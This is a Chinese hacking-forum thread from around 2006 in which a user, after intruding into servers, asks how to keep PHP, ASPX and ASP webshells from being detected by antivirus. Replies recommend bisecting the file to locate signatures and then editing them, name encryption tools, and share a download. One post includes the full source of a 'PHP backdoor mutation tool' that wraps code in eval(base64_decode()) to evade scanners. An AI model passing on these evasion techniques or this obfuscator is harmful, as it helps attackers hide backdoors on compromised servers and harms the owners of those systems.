[讨论]请问PHP ASPX ASP木马如何更好的免杀 木马, ASPX, PHP, 讨论

richy

[讨论]请问PHP ASPX ASP木马如何更好的免杀
议题作者：zhuixun2006
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

请问PHP，ASPX，ASP木马如何更好的免杀。
我试过许多工具，对ASP木马加密效果的确很不错。
我指的是海洋，和老兵，对于其他ASP马，我试过一个。加密之后就不能用了，但是可以反汇编。
而PHP，ASPX我实在不知道如何下手，网上也有工具，但是加密之后，就不可以用了。
所以每次入侵之后，想传PHP，ASPX木马，获得更高权限，都被杀毒软件给查杀。
我很是郁闷，手工免杀，实在是不知道如何是好，请高手支招。http://Zhuixun.A.gg 我的BOLG

帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

ttfct
荣誉会员

pennyhu

如果你懂代码的话,改一改就可以过了TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP 良辰择日，预测咨询，公司改名，权威易经

zhuixun2006
晶莹剔透§烈日灼然

鸥飞007

引用:
这里是引用第[1 楼]的zxzgcn于2006-08-11 11:05发表的：
如果你懂代码的话,改一改就可以过了
请举例 改哪些代码呢。？http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP 赚更多的钱

ttfct
荣誉会员

shirley

用杀软来测试,拆半分析法吧
它要杀哪个,你就改它,很容易过的TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

神無月
晶莹剔透§烈日灼然

大圣

PHP加密的好象有  好象记得是冰狐浪子的作品  是一个PHP文件来的
我用过他加密 可以免杀 可是PHP马体积会变大  
ASPX 的 曾经在网上见过ASP。NET加密工具 不知道是真是假。
帖子124 精华0 积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP 良辰择日，预测咨询，公司改名，权威易经

杀虫剂
晶莹剔透§烈日灼然

bobby

这问题叫虫虫回答吧。他对加解密有研究。 [s:71] 或者叫他写个工具 [s:67]  [s:70]黎叔很生气

帖子70 精华0 积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

zhuixun2006
晶莹剔透§烈日灼然

BG7LHT

请问楼上说的冰狐的工具是不是这个？
我没试过这个，，这个也可以加密PHP吗？
附件
{DEA8E67E-2362-4A19-947D-CB8BEC8A7C31}0.jpg (37 KB)
2006-8-11 13:40
http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

神無月
晶莹剔透§烈日灼然

ocarlee

JSCRIPT 应该不可以的吧  ? 我说的那个PHP加密是变形加密的. 那个东东是火狐的 记错了 呵呵
<?php
/*
=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=
+                 our team [F.S.T]                       +
+          website : http://www.wrsky.com                    +
+      the tool change the code of php base64ed!!                +
=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=
*/
?>
<HTML><HEAD><TITLE>火狐php后门变形工具</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>A {
  COLOR: #000000; TEXT-DECORATION: none
}
A:hover {
  TEXT-DECORATION: underline
}
BODY {
  FONT-SIZE: 12px; SCROLLBAR-ARROW-COLOR: #cc0000; SCROLLBAR-BASE-COLOR: #f8f8f8; BACKGROUND-COLOR: #999999
}
TABLE {
  FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana
}
TEXTAREA {
  FONT-WEIGHT: normal; FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
INPUT {
  FONT-WEIGHT: normal; FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
OBJECT {
  FONT-WEIGHT: normal; FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
SELECT {
  FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
.nav {
  FONT-WEIGHT: bold; FONT-SIZE: 12px; FONT-FAMILY: Tahoma, Verdana
}
.header {
  FONT-WEIGHT: bold; FONT-SIZE: 11px; COLOR: #ffffff; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #cc0000
}
.header A {
  COLOR: #ffffff; TEXT-DECORATION: none
}
.category {
  FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #efefef
}
.tableborder {
  BORDER-RIGHT: #cc0000 1px solid; BORDER-TOP: #cc0000 1px solid; BACKGROUND: #d6e0ef; BORDER-LEFT: #cc0000 1px solid; BORDER-BOTTOM: #cc0000 1px solid
}
.singleborder {
  PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-SIZE: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 1px; PADDING-TOP: 0px; BACKGROUND-COLOR: #f8f8f8
}
.smalltxt {
  FONT-SIZE: 11px; FONT-FAMILY: Tahoma, Verdana
}
.mediumtxt {
  FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana
}
.bold {
  FONT-WEIGHT: bold
}
.multi {
  FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana
}
.navtd {
  FONT-SIZE: 12px; COLOR: #ffffff; FONT-FAMILY: Tahoma, Verdana; TEXT-DECORATION: none
}
.tableborder {
  BORDER-RIGHT: #cc0000 1px solid; BORDER-TOP: #cc0000 1px solid; BACKGROUND: #d6e0ef; BORDER-LEFT: #cc0000 1px solid; BORDER-BOTTOM: #cc0000 1px solid
}
</STYLE>

<META content="MSHTML 6.00.2800.1476" name=GENERATOR></HEAD>
<BODY bgColor=#999999>
<CENTER>
<DIV align=center>
<FORM name=FORM action="" method=post
encType=multipart/form-data>
<TABLE cellSpacing=1 cellPadding=0 width="40%" bgColor=#cc3300 border=0>
  <TBODY>
  <TR>
   <TD colSpan=2 height=30>
    <DIV align=center><STRONG><FONT
    color=#ffffff>火狐php后门变形工具</FONT></STRONG></DIV></TD></TR>
  <TR bgColor=#cccccc>
   <TD vAlign=top height=120><TEXTAREA name=code rows=16 cols=90>
<?php
if (get_magic_quotes_gpc()) {
   $_GET = stripslashes_array($_GET);
  $_POST = stripslashes_array($_POST);
}
  // 去掉转义字符
  function stripslashes_array(&$array) {
    while(list($key,$var) = each($array)) {
      if ($key != &#39;argc&#39; && $key != &#39;argv&#39; && (strtoupper($key) != $key || &#39;&#39;.intval($key) == "$key")) {
        if (is_string($var)) {
          $array[$key] = stripslashes($var);
        }
        if (is_array($var))  {
          $array[$key] = stripslashes_array($var);
        }
      }
    }
    return $array;
  }

if (empty($_POST[&#39;code&#39;])) {
echo"/*\n";
echo "请写入你要转换的代码，去掉程序的开头的<?php和结尾的?&gt！";
echo"\n";
echo "另外提交后请耐心等待，不要重复提交或刷新，会出错的，^_^";
echo"下面给个示范\n*/\n";
echo&#39;phpinfo();&#39;;
}else{
echo"<?php";
echo" eval(base64_decode(&#39;";
echo base64_encode($_POST[&#39;code&#39;]);
echo"&#39;));?>";
}
?>
</TEXTAREA>
  <TR align=middle bgColor=#cccccc>
   <TD colSpan=2 height=32><INPUT type=submit value=开始罪恶的变形></TD></TR>
  <TR align=middle>
   <TD colSpan=2 height=32>Copyright(c)<STRONG><FONT color=#ffffff> <A
    href="http://www.wrsky.com/" target=_blank>火狐原创</A></FONT></STRONG>
    Power By <STRONG><FONT color=#ffffff>Saiy
  </FONT></STRONG></TD></TR></TBODY></TABLE></FORM></DIV></CENTER></BODY></HTML>


找个支持PHP的空间传上去再加密.. 效果不错.
帖子124 精华0 积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

zmdjf
晶莹剔透§烈日灼然

xiezeshen66

大小写互换只对nav有效吧。。咖啡照样杀。
帖子7 精华0 积分24 阅读权限40 在线时间6 小时 注册时间2005-5-7 最后登录2006-8-11 查看详细资料引用 报告 回复 TOP

icexiaoye
荣誉会员

gaofeng

[s:75] 打个广告~
用我做的网马生成器生成的猪3和记忆的ASP木马能过
呵呵，开个玩笑拉
其实无论是脚本马还是EXE木马，想要真正免杀，对语言一定要掌握，掌握到及至，就是自己写，这样什么杀毒软件都拿你没办法
要是达不到这水平，比如对EXE木马改特征码的话，想弄好，一定要对汇编有一定了解，毕竟有些地方胡改是不行的
同例，要改ASP，ASPX马，最好也要对ASP，ASP。NET有一定了解
在特征码处改成自己的语言又不影响程序运行

汗~~说了半天感觉没帮上你~~~ [s:58]玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.

帖子728 精华4 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 查看个人网站
查看详细资料引用 报告 回复 TOP

ttfct
荣誉会员

超越改

哎,火狐php后门变形工具===>base64_decode函数加密TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

fhod
运维管理组

fjx16888

貌似偶这里有一个很牛的加密工具
现在在公司
等回家了传上来份..有的人或许用过或见过.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

ttfct
荣誉会员

houyongwang_5

楼上的,工作了? 你88年的啊TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

zhuixun2006
晶莹剔透§烈日灼然

小鱼儿

引用:
这里是引用第[12 楼]的fhod于2006-08-13 13:38发表的：
貌似偶这里有一个很牛的加密工具
现在在公司
等回家了传上来份..有的人或许用过或见过.
羡慕你们都工作了啊,我都还在读高一..苦苦啊...

希望早点把工具发出来哦...谢谢了.http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

fhod
运维管理组

sxp

引用:
这里是引用第[13 楼]的zxzgcn于2006-08-13 15:30发表的：
楼上的,工作了? 你88年的啊
刚应聘上的..一家大商场的系统管理员..

刚到家..把工具上传下....有需要的人来down
附件
051231jiami.rar (18 KB)
2006-8-13 23:00, 下载次数: 569
加密工具

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

juey
荣誉会员

东视人

楼上的哥哥，那工具不能用，出错
晕
图传不上来努力就有回报别和我说技术............因为我不懂什么叫技术....
帖子305 精华4 积分3762 阅读权限100 在线时间446 小时 注册时间2005-10-28 最后登录2008-5-17 查看详细资料引用 报告 回复 TOP

fhod
运维管理组

盈盈

程序是VB写的
需要运行库
去下把.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

zhuixun2006
晶莹剔透§烈日灼然

shirley

额。。。。这个工具不就是火狐的黑客伟写的吗？他也能加密PHP吗？http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

xiaocool
晶莹剔透§烈日灼然

SUNNY仔

引用:
这里是引用第[3 楼]的zxzgcn于2006-08-11 11:15发表的：
用杀软来测试,拆半分析法吧
它要杀哪个,你就改它,很容易过的
象海洋的，他就杀开始那段的ID数字，这怎么改？
帖子162 精华2 积分431 阅读权限40 在线时间75 小时 注册时间2005-8-4 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

tale007
晶莹剔透§烈日灼然

niufen

哪位有aspx加密的木马就直接上传个，怎么都找不工具加密郁闷
帖子41 精华0 积分62 阅读权限40 性别男 在线时间24 小时 注册时间2006-6-20 最后登录2008-5-4 查看详细资料引用 报告 回复 TOP

hzy0110
晶莹剔透§烈日灼然